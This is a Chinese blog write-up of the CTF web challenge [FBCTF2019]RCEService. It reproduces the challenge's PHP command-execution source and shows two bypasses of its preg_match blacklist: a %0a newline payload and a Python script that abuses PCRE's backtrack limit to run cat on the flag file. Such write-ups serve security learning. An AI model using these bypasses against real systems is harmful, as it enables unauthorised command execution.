BUUCTF:[FBCTF2019]RCEService

最新推荐文章于 2025-02-24 21:32:54 发布
最新推荐文章于 2025-02-24 21:32:54 发布
阅读量1.9k 收藏 1
点赞数 2
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mochu7777777/article/details/105151353
本文介绍了一种利用PHP的PCRE(Perl兼容正则表达式)回溯次数限制来绕过某些安全限制的方法。通过详细分析和实践,文章展示了如何使用特殊的payload绕过系统对特定命令的禁用,实现对敏感文件的读取。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述
题目叫我们以JSON的格式提交命令,先随便输
在这里插入图片描述
提交JSON格式

?cmd={"cmd":"ls"}

在这里插入图片描述
但是经测试发现很多命令被禁止了
在网上找到的源码2333:

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

先看一种简单的解法:
preg_match()函数只能匹配第一行数据,可以使用换行符%0a绕过,payload:

?cmd={%0A"cmd":"/bin/cat /home/rceservice/flag"%0A}

慢慢摸索路径就可以找到flag
在这里插入图片描述
第二种解法应该也是预期解法PRCE
参考:P神:PHP利用PCRE回溯次数限制绕过某些安全限制
P神已经解释的很详细了,使用脚本进行回溯次数绕过

import requests

payload = '{"cmd":"/bin/cat /home/rceservice/flag","test":"' + "a"*(1000000) + '"}'
res = requests.post("http://ad66432f-4628-41f6-8190-d9b9c247904c.node3.buuoj.cn/", data={"cmd":payload})
#print(payload)
print(res.text)

在这里插入图片描述

BUUCTF WEBRCESERVICE
qq_41696858的博客
03-02 616
首先这题没源码是万万做不出来的,反正我是不知道这源码从哪来的 先上源码 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/
[FBCTF2019]RCEService
小飒的博客
07-07 916
看完p神的文章觉得收益匪浅,打算记录下 本题知识点为对preg_match的绕过 看wp这题是有源码的 方法1 开头的 ^ 和结尾的 $ 让PHP从字符串开头检查到结尾 对于这种类型的可以使用%0a绕过 平时做题也遇到过 putenv(‘PATH=/home/rceservice/jail’); 意思是:配置系统环境变量到/home/rceservice/jail,一般是配置到/bin目录下,例如我的环境变量就有/usr/local/sbin 、 /usr/local/bin 、/usr/sbin 、 /u
BUUCTF:[FBCTF2019]RCEService
../../../../../../../
06-23 846
打开界面 可以看见提示说要用JSON格式输入cmd中 先尝试一下 {"cmd":"ls"} 出现一个index.php文件 但是获取不到,题目也没有其他信息,然后发现原本题目是提供了源码的,去网上找了找 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacki
BUUCTF [FBCTF2019]go_get_the_flag
weixin_53349587的博客
12-10 1109
1.拿到文件,查壳: E ELF文件,64位。 不难发现这个文件相比正常文件要大的多,猜测是用go语言写的。 2.IDA打开,找到函数部分: 全是未知函数。 同时运行程序后搜索关键字符串,结果是一堆特别长的字符串,分析了半天,什么也没分析出来。。。 这种情况下,需要进行go语言去符号化。 3.去符号化之后,重新查看函数: 函数正常多了,我们找到main_main函数: 也没有什么线索。 此时注意到main_main函数下面有一个main_checkpassword...
BUUCTF中web2[fbctf2019]rceservice 1
最新发布
04-03
### 关于 BUUCTF Web2 和 FBCTF 2019 RCEService 的挑战解析 #### 背景概述 在 CTF 比赛中,Web 类型的题目通常涉及 SQL 注入、命令执行、文件上传漏洞等多种攻击向量。对于提到的 **BUUCTF Web2** 和 **FBCTF 2019...
BUUCTF:[GWCTF 2019]你的名字 --- ssti -- bypass 学习
Zero_Adam的博客
04-22 1946
一、自己做: 抓包没啥,除非要扫目录, 啊,,就是直接返回的逻辑,,xss也是直接返回,也就说明有某些机制了,然后想去闭合一些标签,但是都没成功,</div>,</h1>,这些, 感觉没思路了,,扫扫目录把。 别了,想到了ssti,试了一下:{{2*2}},报错了 Parse error: syntax error, unexpected T_STRING, expecting '{' in \var\WWW\html\test.php on line 13 而且,还不能处理中文
buuctf[GXYCTF2019]Ping Ping Ping
hintll的博客
03-21 5508
buuctf[GXYCTF2019]Ping Ping Ping 这个题目的标题是pingping盲猜是关于命令执行的题目 打开环境后 只有一个/ip=? 应该是提示用get的方式来传参一个地址执行ping的操作 直接ping127.0.0.1 回显ping127.0.0.1的数据 说明是一道命令执行的题目 执行:?ip=127.0.0.1|ls 其中|的作用是命令分隔符 还有相关的符号 ; --在 shell 中,是”连续指令” & --不管第一条命令成功与否,都会执行第二条命令 &
BUUCTF:[ISITDTU 2019]EasyPHP --- rce 超级异或,,,吐了,,,字符之间异或, 成型的异或payload!!!
Zero_Adam的博客
04-06 1954
目录:一、自己做:二、学的的三、学习WP1. 这里先来个不限制字符个数的关于这个%ff 以及异或的事情,咱们好好唠唠1.生成异或中间值的python脚本2. 看有字符限制的时候,:!!干了,,发现了一个更好多python脚本,,接着做题~。 一、自己做: <?php highlight_file(__FILE__); $_ = @$_GET['_']; if ( preg_match('/[\x00- 0-9\'"`$&.,|[{_defgops\x7F]+/i', $_) ) di
BuuCTF [FBCTF2019]RCEService
Raners_的博客
02-24 314
这一步发现被过滤了。试了很多种方法,都没有找到可行的替代方法,上网查看wp,发现这道题还有源码?putenv已经把环境变量改了,所以只能通过输入cat在系统文件中的绝对路径才能使用。我是web的菜鸡,这第一篇博客就留给web吧,希望大佬们看到了轻点喷(...)preg_match函数只能检测第一行,所以需要绕过只需要用一个换行符即可。看到首页的JSON提示,准备构造JSON语句。操作,发现flag位于home/rceservice目录下。cat在/bin文件夹下,因此想要调用cat指令需要。
FBCTF2019-RCEService
anwen12的博客
02-26 308
0x01 题目初现 <?php putenv('PATH=/home/rceservice/jail'); if (isset($_REQUEST['cmd'])) { $json = $_REQUEST['cmd']; if (!is_string($json)) { echo 'Hacking attempt detected<br/><br/>'; } elseif (preg_match('/^.*(alias|bg|bind|break|bui
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

末 初

谢谢老板~感谢!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值